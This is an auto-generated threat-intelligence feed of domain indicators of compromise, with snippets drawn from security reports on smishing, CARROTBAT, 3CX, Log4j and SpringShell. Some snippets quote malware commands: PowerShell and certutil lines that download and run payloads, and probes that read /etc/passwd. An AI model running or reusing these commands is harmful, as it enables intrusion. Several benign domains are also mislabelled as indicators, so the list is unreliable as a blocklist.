ZeroHour

Indicators of compromise

1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domaincom-chargedae.worldass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassnThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-emea.topsny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-etcha.win[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-etcoz.winzpass.com-emea[.]top pikepass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpassThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-hbg.vipn e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-hzasr.bidn[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpassThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-isjjz.top]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpasThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-jw.icu]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-kien.topass.com-chargedae[.]world e-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-lg.icutors of Compromise icloud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-taxThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-pay.online-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-posewxts.toppay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-isjjz[.]top flde-lity.coThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-pvbfd.winlde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top piThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-remove-device.topthe Cyber Threat Alliance . Indicators of Compromise icloud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-statementzz.worldzpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]world e-zpass.com-emea[.]top pikepass.com-chargedae[.]world e-zThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-tollbiler.icua[.]win usps.com-isjjz[.]top flde-lity.com-jw[.]icu e-zpass.com-tollbiler[.]icu e-zpassny.com-pvbfd[.]win e-zpass.com-statementzz[.]worldThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaincom-xxai.vipe-zpass.com-etcoz[.]win e-zpassny.com-kien[.]top e-zpassny.com-xxai[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainco-ykk.vip]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info AdditionalThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainde-yiore.store-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-etcha[.]win usps.com-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-addpayment.infoictims. For instance, a casual inspection of the domain irs.gov-addpayment[.]info could trick people into thinking they are navigating to iThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-etcfr.win[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-etczhh.ccoud.com-remove-device[.]top flde-lity.com-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-hzwy.livexin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-imky.winvip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-mhmt.xin[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.gThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-mo.netxin e-zpassny.gov-hzwy[.]live irs.gov-addpayment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-tax.cfd-lg[.]icu michigan.gov-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-tax.icu-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yioreThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-tosz.live[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.orgThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainid-39732.info.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet Crime Complaint Center (IC3The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainid-89b98.coment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet CrimThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainil-363.com.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainirs.govnfo could trick people into thinking they are navigating to irs[.]gov . Figure 3 shows the most popular prefixes of domain nameThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-pvwh.xinky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.govThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-qac.xin]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-yga.xind e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainclinic.site. In this medical application, patients can use the API api.clinic[.]site/get_history?visit_id=XXXX to access the doctor visit noteHarnessing LLMs for Automating BOLA Detection
Palo Alto Unit 42
· Aug 17, 2026
domainnitesbr1.orgnload a VBScript file from the following URL: http:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html This VBScript file yet agaNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
domain000webhostapp.comct System . Net . WebClient ) . DownloadFile ( 'https://881.000webhostapp[.]com/0_31.doc' , '%TEMP%\\AAA.exe' ) ; Start - Process ( '%TEMThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domain000webhost.commmunication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observed the OceanSalt malwareThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domain1apps.com^ e ^ r ^ tutil - urlca ^ che - spl ^ it - f http : //s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit This commanThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbyethost10.comhosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbyethost7.comwith the following hosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning inThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbytehost31.orgongs to the SYSCON malware family. It communicates with ftp.bytehost31[.]org via FTP for command and control (C2). Figure 2 SYSCON netThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainnknews.orgarticle that was published on the same day as the attack by NKNews[.]org. The article in question discusses diplomatic ties betweeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainwebhost.combyethost7[.]com ftp.byethost10[.]com files.000webhost[.]com webhost[.]com 61.14.210[.]72:7117The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainwebmail-koryogroup.comcom/1.txt http://bluemountain.1apps[.]com/1.txt https://www.webmail-koryogroup[.]com/keep/1.txt http://filer1.1apps[.]com/1.txt ftp.byethost7[The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainyandex.rushing email was sent from the email address of yuri.sidorav@yandex[.]ru to a high ranking individual within a British governmentThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainaffiliatecollective.club} Campaign Identifier: '\xf1\xaf\x02i.]\xa4\xe0' C2 Server: affiliatecollective[.]club C2 Port: 443 Hash Value: 0304674e9876530dfbea5a9b4fec7b98Cardinal RAT Sins Again, Targets Israeli Fin
Palo Alto Unit 42
· Aug 17, 2026
domain1ma.xyzmpts that involved a callback URL that contained the domain 1ma[.]xyz , as seen in the following example: <redacted>.com.80.refAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainautomationyesterday.com346,888 195.54.160[.]149 250,042 canarytokens[.]com 198,954 automationyesterday[.]com 166,206 45.83.193[.]150 120,707 64.39.98[.]200 118,860 prAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainburpcollaborator.net.]159 80,075 interactsh[.]com 68,959 5.101.118[.]127 51,515 burpcollaborator[.]net 51,066 31.131.16[.]127 48,119 45.66.8[.]12 46,753 185.246Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domaincanarytokens.com[.]in 552,521 45.83.64[.]1 346,888 195.54.160[.]149 250,042 canarytokens[.]com 198,954 automationyesterday[.]com 166,206 45.83.193[.]150Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domaininteract.sh36,563,784 nessus[.]org 14,638,414 172.16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domaininteractsh.comrt[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interactsh[.]com 68,959 5.101.118[.]127 51,515 burpcollaborator[.]net 51,0Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainnessus.orgity scanning services are represented in this list, such as nessus[.]org as the top callback involving a remote location. Domain/IAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainoob.lirg 14,638,414 172.16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1 346,888 195.54.1Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainpraetorian.com]com 166,206 45.83.193[.]150 120,707 64.39.98[.]200 118,860 praetorian[.]com 115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,8Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainsecuritysupport.tech]200 118,860 praetorian[.]com 115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interacAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainsploit.in.16.0.0/12 1,818,036 interact[.]sh 852,778 oob[.]li 571,042 sploit[.]in 552,521 45.83.64[.]1 346,888 195.54.160[.]149 250,042 canAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domainupguard.com115,739 192.168.0.0/16 86,513 securitysupport[.]tech 83,875 upguard[.]com 83,379 193.3.19[.]159 80,075 interactsh[.]com 68,959 5.10Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· Aug 17, 2026
domaindiscordapp.comosted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.Threat Brief: Ongoing Russia and Ukraine Cyber Activity
Palo Alto Unit 42
· Aug 17, 2026
domain3cx.comw glcloudservice[.]com/v1/status pbxsources[.]com/queue www.3cx[.]com/blog/event-trainings/ Note that the www.3cx[.]com URL aboThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainakamaicontainer.comiofactory.com|.*zacharryblogs.com" OR dns_query_name ~ = ".*akamaicontainer.com|.*akamaitechcloudservices.com|.*azuredeploystore.com|.*azurThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainakamaitechcloudservices.com62a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa41797aThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainazuredeploystore.com1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff936eThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainazureonlinestorage.com237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf123Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domaingithubusercontent.coms a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request lookThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainglcloudservice.com0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f250c6Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainmsedgepackageinfo.coma0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0c34Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainmsstorageazure.comf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896c57Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainmsstorageboxes.comfb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e046Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainofficeaddons.com4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838f6fThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainofficestoragebox.com33a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efbb50Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainpbxcloudeservices.com10ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accountThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainpbxphonenetwork.comacharryblogs[.]com/xmlquery pbxcloudeservices[.]com/network pbxphonenetwork[.]com/phone akamaitechcloudservices[.]com/v2/fileapi azureonlinThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainpbxsources.comde3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e513Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainsourceslabs.com45b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b368Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainvisualstudiofactory.com0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf43aThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainzacharryblogs.comc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae158Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainbbvanet.com.mxbancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward financial institutions, financExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domainhsbc.com.mxs where ?? represents unidentified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mxExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domainhsbcnet.comtified SHA256 hashes: www.??.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresaExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domainixe.com.mxww1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hosts align toward fiExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domainmonex.com.mx?.??.hsbc[.]com[.]mx www1.secure.hsbcnet[.]com bancadigital.monex[.]com[.]mx nixe.ixe[.]com[.]mx empresas.bbvanet[.]com[.]mx These hExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domaintrilivok.com6 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 hxxps : //trilivok[.]com/4g3031ar0/cb6y1dh/it.php hxxp : //trilivok[.]com/4g3031arExploring the Latest Mispadu Stealer Variant
Palo Alto Unit 42
· Aug 17, 2026
domainatt.netenabled? Or is the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • AugHacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· Aug 17, 2026
domainatt.someotherdomain.netis the user meant not to notice a redirect from att.net to att.someotherdomain.net or something? Andrew Olpin • August 17, 2026 9:32 AM Yes, tHacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· Aug 17, 2026
domainfoo.comedLight • August 17, 2026 6:54 PM Uhhh. Wait a sec… I go to foo.com on my computer’s web-browswer. DNS lookup is redirected andHacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· Aug 17, 2026
domainwww.schneier.comem, three of the five browsers on my laptop complained that www[dot]schneier[dot]com was insecure, and somebody might be spoofing it. IHacking Public Wi-Fi DNS to Steal Credentials
Schneier on Security
· Aug 17, 2026
domainburpcollaborator.netsswd cat+/etc/passwd id ifconfig ipconfig ping%20[redacted].burpcollaborator[.]net Observed in the Wild Our Spring Core Remote Code ExecutioCVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainggdd.co.ukt general scanning activity. ls nslookup%20[redacted].test6.ggdd[.]co[.]uk nslookup+[redacted].test6.ggdd[.]co[.]uk ping%20[redactCVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
Palo Alto Unit 42
· Aug 17, 2026
domainoutlook.comOWA-ExplicitLogonUser that has a value of owa/mastermailbox@outlook[.]com . The header value is removed from the URL during processThreat Brief: OWASSRF Vulnerability Exploitation
Palo Alto Unit 42
· Aug 17, 2026
domaincheckblacklistwords.eueation with WildFire and Advanced URL Filtering. The domain checkblacklistwords[.]eu used to host the various files needed for infection and tFake CVE-2023
Palo Alto Unit 42
· Aug 17, 2026
domainstreamable.com. The instructions also include a link to a video hosted on streamable[.]com . The video is no longer hosted at the URL within the REAFake CVE-2023
Palo Alto Unit 42
· Aug 17, 2026
domaincdn-sina.twckers attempted to create a connection to the domain images.cdn-sina[.]tw to download a file named scvhost.txt . This file was a CoPersistent Attempts at Cyberespionage Against Southeast Asian Government Target Have Links to Alloy Taurus
Palo Alto Unit 42
· Aug 17, 2026
domainb8pjmgd6.compdate.fjke5oe[.]com www.i5y3dl[.]com www.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com ArchiStately Taurus Activity in Southeast Asia Links to Bookworm Malware
Palo Alto Unit 42
· Aug 17, 2026
domainfjke5oe.comanhlab.exe C:\Users\hack\Desktop\uuid\uu\Release\uu.pdb www.fjke5oe[.]com Nov. 9, 2022 5064b2a8fcfc58c18f53773411f41824b7f6c2675c1dStately Taurus Activity in Southeast Asia Links to Bookworm Malware
Palo Alto Unit 42
· Aug 17, 2026
domainggrdl4.comwww.hbsanews[.]com www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-winStately Taurus Activity in Southeast Asia Links to Bookworm Malware
Palo Alto Unit 42
· Aug 17, 2026
domaingm4rys.comm www.b8pjmgd6[.]com www.zimbra[.]page www.ggrdl4[.]com www.gm4rys[.]com Archives Related to PubLoad Using V6-winsp1-wuredir SHA25Stately Taurus Activity in Southeast Asia Links to Bookworm Malware
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.